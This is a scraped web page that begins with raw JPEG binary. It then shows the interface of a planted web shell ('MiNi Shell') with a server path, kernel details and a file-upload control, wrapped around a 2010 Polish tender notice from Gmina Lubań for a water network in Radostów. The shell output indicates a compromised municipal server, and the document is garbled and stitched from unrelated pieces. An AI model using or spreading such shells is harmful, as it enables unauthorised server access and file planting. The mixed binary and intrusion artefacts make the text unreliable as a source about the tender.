JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/18736-N-2010.html

<p class="kh_header"><b>Lubań: Budowa sieci wodociągowej w Radostowie Dolnym, Średnim i Górnym w ramach zadania inwestycyjnego pn. I Etap Budowa sieci wodociągowej w Radostowie Dolnym, Średnim i Górnym</b><br>
<b>Numer ogłoszenia: 18736 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubań , ul. Dąbrowskiego 18, 59-800 Lubań, woj. dolnośląskie, tel. 075 6465920, faks 075 612 68 50.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej w Radostowie Dolnym, Średnim i Górnym w ramach zadania inwestycyjnego pn. I Etap Budowa sieci wodociągowej w Radostowie Dolnym, Średnim i Górnym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje następujący zakres prac:
1.1. budowę sieci wodociągowej w miejscowości Radostów Średni od węzła W 114 do W 116 o średnicy 160 i 90 mm z rur PVC łączonych na uszczelkę oraz z rur PEHD w miejscach przejść o średnicy 160 wraz z osprzętem,
1.2. wykonanie sieci wodociągowej w miejscowości Radostów Średni węzeł W 130 z rur PEHD o średnicy 63 mm wraz z osprzętem,
1.3. wykonanie sieci wodociągowej w miejscowości Radostów Górny od węzła W 230 do W 268 z rur PVC o średnicy 160 i 90  oraz z rur PEHD w miejscach przejść o średnicy 160 i 90 wraz z osprzętem.
1.4. montaż hydrantu i zasuwy na istniejącej sieci wodociągowej w m. Radostów Dolny.
Ad. 1.1.- 1.4. 
Zakres prac obejmuje wykonanie sieci wodociągowej z rur PVC/PN10 o średnicy160,90 łączonych na kielichach i uszczelkę oraz PEHD -100 SDR 17/PN10 o średnicy 160, 90, 63 łączonych poprzez zgrzewanie doczołowe wraz z pełnym uzbrojeniem. Sieć uzbrojona w zasuwy żeliwne, kołnierzowe z klinem gumowym, z obudową i skrzynką uliczną do zasuw. Hydranty nadziemne 80 nr kat. 855, Hz=1500mm. Skrzynki uliczne i hydranty obudować dwoma rzędami kostki brukowej gr. 8 cm.
1.5. wykonanie remontu dróg w Radostowie Dolnym, Średnim i Górnym o nawierzchni z materiału kamiennego- tłucznia frakcji 31,5 mm do 63,0 mm o gr. 23  i materiału kamiennego do klinowania - miał kamienny frakcji 0,00 mm do 4,0 mm o łącznej grubości 24 cm,
1.6. Wykonanie remontu dróg w Radostowie Dolnym i Średnim o nawierzchni z betonu asfaltowego - warstwa ścieralna o gr. 7 cm,
1.7. plantowanie terenu w Radostowie Dolnym, Średnim i Górnym po zajętym pasie gruntu niezbędnym do wykonania prac budowlano -montażowych,
1.8. wytyczenie w terenie trasy sieci wodociągowej,
1.9. inwentaryzacja powykonawcza sieci.
UWAGA : zakres prac nie obejmuje wykonania przyłączy wodociągowych.
2. Ponadto do obowiązków wykonawcy należy:
2.1. ubezpieczenie terenu budowy,
2.2. zabezpieczenie kierownika budowy,
2.3. odbiory ( San.-Epid., Straż Pożarna, Inspekcja Pracy),
2.4. uzgodnienia,
2.5.badania wody ( mikrobiologiczne),
2.6.  uzyskanie zgody na zajęcie pasa dróg od jej właścicieli  i poniesienia kosztów związanych z ich zajęciem,
2.7. uzyskanie i przedłożenie do Urzędu Gminy Lubań przez wykonawcę robót (działającego w imieniu  Wójta Gminy Lubań) Decyzji  pozwolenia na użytkowanie sieci wodociągowej od Powiatowego Inspektora Nadzoru Budowlanego w Lubaniu,
2.8. udzielenie 5 letniej gwarancji na wykonane roboty budowlane.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.00-8, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Należy wnieść wadium w kwocie 10 000 zł (słownie: dziesieć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia  mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
1.1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
1.2.  posiadania wiedzy i doświadczenia tj. wykażą, że  w okresie ostatnich 5 lat przed upływem terminu składania ofert , a jeżeli   okres   prowadzenia działalności  jest krótszy - w tym okresie,  wykonali  co najmniej 4  roboty budowlane polegające na budowie sieci wodociągowych lub kanalizacyjnych  na kwotę nie mniejszą niż  400 000  zł brutto każda,
1.3 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi  do wykonania zamówienia;
1.4  sytuacji ekonomicznej i finansowej tj.  posiadają polisę , a w przypadku jej braku inny dokument potwierdzający, że Wykonawca   jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności   na kwotę nie mniejszą niż 100 000 zł;
2.  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie  dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający żąda wykazania za pomocą  dokumentów wykazanych w rozdziale 4  w pkt. od 1.1. do 1.5., iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust.1 ustawy, o ile te podmioty będą brały udział w realizacji części zamówienia.
3. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty:
a)	wypełniony i podpisany Formularz Oferty zgodnie ze wzorem stanowiącym załącznik nr 4  do SIWZ,
b)	oświadczenie, że   Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy (wg wzoru stanowiącego  załącznik nr 5 do SIWZ);
c)	oświadczenie o braku podstaw do wykluczenia w zakresie  art. 24 ust. 1 ustawy pzp (wg wzoru stanowiącego  załącznik nr 6 do SIWZ);
d)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e)	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub 
      potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
      rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
      właściwego  organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu    
       składania  ofert,
                    f) wykaz wykonanych robót budowlanych w okresie  ostatnich pięciu lat przed dniem  
                        wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia jest 
                        krótszy -  w tym okresie,  z podaniem ich rodzaju i wartości,  daty  i miejsca 
                       wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały 
                        wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  ( wg  wzoru  
                       stanowiącego   załącznik nr 7 do SIWZ),
                   h) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że 
                       Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
                        działalności związanej z przedmiotem zamówienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> luban.nowoczesnagmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lubań
ul. Dąbrowskiego 18
59-800 Lubań
pok. nr 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 09:00, miejsce: Urząd Gminy Lubań
ul. Dąbrowskiego 18
59-800 Lubań
sekretariat-pok. nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com